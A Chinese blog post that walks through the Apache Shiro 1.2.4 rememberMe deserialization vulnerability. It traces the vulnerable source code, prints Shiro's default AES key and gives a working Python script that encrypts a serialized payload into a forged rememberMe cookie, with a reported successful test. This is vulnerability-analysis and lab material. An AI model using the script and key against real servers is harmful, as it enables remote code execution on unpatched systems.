[Java反序列化]—Shiro反序列化(一)

已于 2022-09-14 14:19:09 修改
阅读量2.8k 收藏 6
点赞数 5
分类专栏: Java 文章标签: java 开发语言
于 2022-06-27 08:56:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/125477523
版权
本文详细解析了Apache Shiro 1.2.4版本的反序列化RCE漏洞,涉及RememberMe功能的Cookie处理过程,包括AES加密、Base64编码和解密,关键在于找到并利用默认的AES密钥。作者演示了如何构造Payload,并通过脚本实现AES加密和cookie构造,展示了漏洞复现的过程。
摘要由CSDN通过智能技术生成

前言

前篇进行了shiro550的IDEA配置,本篇就来通过urldns链来检测shiro550反序列化的存在

漏洞原理

Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。
那么,Payload产生的过程:
命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值
在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Payload构造起来也是十分的简单。

影响版本

Apache Shiro <= 1.2.4

特征

  • 未登陆的情况下,请求包的cookie中没有rememberMe字段,返回包set-Cookie里也没有deleteMe字段

  • 登陆失败的话,不管勾选RememberMe字段没有,返回包都会有rememberMe=deleteMe字段

  • 不勾选RememberMe字段,登陆成功的话,返回包set-Cookie会有rememberMe=deleteMe字段。但是之后的所有请求中Cookie都不会有rememberMe字段

  • 勾选RememberMe字段,登陆成功的话,返回包set-Cookie会有rememberMe=deleteMe字段,还会有rememberMe字段,之后的所有请求中Cookie都会有rememberMe字段

流程分析

看完基本原理应该也不难发现,shiro反序列化主要就是对cookie进行的一系列操作,所以利用点就从Cookie有关的说起:

shiro原生文件中找到了CookieRememberMeManager.java对cookie中的字段进行管理,其中有个rememberSerializedIdentity(),可以对remember认证信息进行序列化

在这里插入图片描述

既然有了对认证信息的操作,就需要获取认证信息找到了getRememberedSerializedIdentity(),主要是对cookie进行base64解密操作

在这里插入图片描述

继续寻找在哪里进行了调用,找到了AbstractRememberMeManager.javagetRememberedPrincipals()

在这里插入图片描述

其中会调用convertBytesToPrincipals(),进行字节和认证信息转换,跟进一下

protected PrincipalCollection convertBytesToPrincipals(byte[] bytes, SubjectContext subjectContext) {
    if (getCipherService() != null) {
        bytes = decrypt(bytes);
    }
    return deserialize(bytes);
}

if中进行了decrypt解密操作,最后返回反序列化内容,跟进一下decrypt(),看看具体执行了什么

protected byte[] decrypt(byte[] encrypted) {
    byte[] serialized = encrypted;
    CipherService cipherService = getCipherService();
    if (cipherService != null) {
        ByteSource byteSource = cipherService.decrypt(encrypted, getDecryptionCipherKey());
        serialized = byteSource.getBytes();
    }
    return serialized;
}

getCipherService(),获取算法再通过decrypt()对通过getDecryptionCipherKey()获取的key进行解密,跟进getDecryptionCipherKey()

public byte[] getDecryptionCipherKey() {
    return decryptionCipherKey;
}

返回了decryptionCipherKey,看下它是在哪里赋的值

在这里插入图片描述

再看哪里调用了setDecryptionCipherKey(),找到了setCipherKey()

在这里插入图片描述

继续向上找最终找到了AbstractRememberMeManager(),而它的DEFAULT_CIPHER_KEY_BYTES是一个固定值

public AbstractRememberMeManager() {
    this.serializer = new DefaultSerializer<PrincipalCollection>();
    this.cipherService = new AesCipherService();
    setCipherKey(DEFAULT_CIPHER_KEY_BYTES);
}

至此也就相当于找到了解aes的秘钥,为我们的cookie的构造创造了条件

private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");

接着回到convertBytesToPrincipals(),跟进deserialize()

protected PrincipalCollection convertBytesToPrincipals(byte[] bytes, SubjectContext subjectContext) {
    if (getCipherService() != null) {
        bytes = decrypt(bytes);
    }
    return deserialize(bytes);
}

接着跟进deserialize()

protected PrincipalCollection deserialize(byte[] serializedIdentity) {
    return getSerializer().deserialize(serializedIdentity);
}

在这里插入图片描述

最终就到了readObject执行反序列化

public T deserialize(byte[] serialized) throws SerializationException {
    if (serialized == null) {
        String msg = "argument cannot be null.";
        throw new IllegalArgumentException(msg);
    }
    ByteArrayInputStream bais = new ByteArrayInputStream(serialized);
    BufferedInputStream bis = new BufferedInputStream(bais);
    try {
        ObjectInputStream ois = new ClassResolvingObjectInputStream(bis);
        @SuppressWarnings({"unchecked"})
        T deserialized = (T) ois.readObject();
        ois.close();
        return deserialized;
    } catch (Exception e) {
        String msg = "Unable to deserialze argument byte array.";
        throw new SerializationException(msg, e);
    }
}

漏洞复现

用脚本将序列化生成的文件1.txt进行aes加密

import sys
import base64
import uuid
from random import Random
from Crypto.Cipher import AES

def get_file(filename):
    with open(filename,'rb') as f:
        data = f.read()
    return data


def aesEncode(data):
    BS = AES.block_size
    pad = lambda s: s + ((BS-len(s)%BS)) * chr(BS-len(s)%BS).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key),mode,iv)
    ciphertext = base64.b64encode(iv+encryptor.encrypt(pad(data)))
    return ciphertext
def aesDecode(enc_data):
    enc_data = base64.b64decode(enc_data)
    unpad = lambda s:s[:-s[-1]]
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = enc_data[:16]
    encryptor = AES.new(base64.b64decode(key),mode,iv)
    plaintext = encryptor.decrypt(enc_data[16:])
    plaintext = unpad(plaintext)
    return plaintext 



if __name__ == '__main__':
    data = get_file("1.txt")
    print(aesEncode(data))

在这里插入图片描述

生成后传入cookie中,成功回显

在这里插入图片描述

S1nJa
关注
专栏目录
[Java反序列化]—Shiro反序列化(二)
snowlyzz的博客
12-06 544
shiro RCE利用
shiro反序列化
热门推荐
weixin_48776804的博客
05-12 1万+
shiro反序列化
shiro550反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_shiro550原理
最新发布
baimao__Ch的博客
08-14 916
如何判断我的服务器是否受到了针对shiro550漏洞的攻击?检查日志:查看系统的日志文件,看是否有异常的访问记录或登录失败记录,如果发现了异常,可以进一步分析该记录是否与Shiro550漏洞有关。检查系统状态:检查系统是否存在异常状态,如系统崩溃、服务宕机等,这可能是攻击者利用Shiro550漏洞进行攻击导致的。检查用户行为:检查是否有用户在短时间内多次尝试登录或者进行异常操作,这可能是攻击者正在利用Shiro550漏洞尝试获取系统权限。
漏洞分析 | 经典的Shiro反序列化
2301_80115097的博客
03-26 1775
其实这个还是得学习学习加密解密的方法,才能进行编写poc,但是此处只是了解个思路。具体可参考其他文章;声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等应急响应笔记学习路线。
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
shiro反序列化工具,加强版
12-27
加强版的"shiro反序列化工具"可能是一个用于检测、测试或利用此类漏洞的工具。 为了理解这个工具的工作原理,我们需要知道反序列化攻击的基本步骤: 1. **构造恶意序列化对象**:攻击者创建一个包含恶意代码的序列...
shiro反序列化复现.zip
08-03
通常,它会创建一个恶意的序列化对象,并尝试通过Shiro的某个API进行反序列化,从而触发潜在的安全问题。 2. **测试环境**:可能包含一个预配置的服务器环境,模拟了存在反序列化漏洞的Shiro应用,使得用户可以在可...
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
shiro反序列化测试工具.zip
06-04
shiro反序列化测试工具包,两个使用任意一个即可
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
文件内包含内容如下: 1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro反序列化漏洞、暴力破解漏洞修改方法
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞。
反序列化利用工具ShiroExploit.V2.51.7z
08-31
反序列化利用工具
shiro反序列化分析
2301_79724395的博客
06-11 945
Apache Shiro 是一个 Java 安全框架,包括如下功能和特性:Authentication:身份认证/登陆,验证用户是不是拥有相应的身份。在 Shiro 中,所有的操作都是基于当前正在执行的用户,这里称之为一个 Subject,在用户任意代码位置都可以轻易取到这个Subject。
shiro反序列化总结
qq_31812157的博客
03-11 575
但由于request的inputbuffer会复用,所以在修改完maxHeaderSize之后,需要多个连接同时访问(burp开多线程跑),让tomcat新建request的inputbuffer,这时候的buffer的大小就会使用修改后的值。这里附上poc,使用方法和上面相同,还是对class进行base64编码,放到cc2中生成序列化文件,如果有用过天下大木头师傅的文件的,这个文件和他有点小区别,我们可以把这个类进行类加载,因此cc2,cc3,cc4都是可以用这个类,因为他们是调用了。
漏洞复现——shiro反序列化
小林说安全的博客
05-22 5389
漏洞复现——shiro反序列化
shiro反序列化原理
06-25
关于反序列化(Deserialization)原理Shiro 并不是直接处理反序列化的,但其在处理JSON或XML等外部数据格式时,可能会涉及到与序列化相关的安全性考虑。 当Shiro从存储(如数据库或配置文件)加载配置信息时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值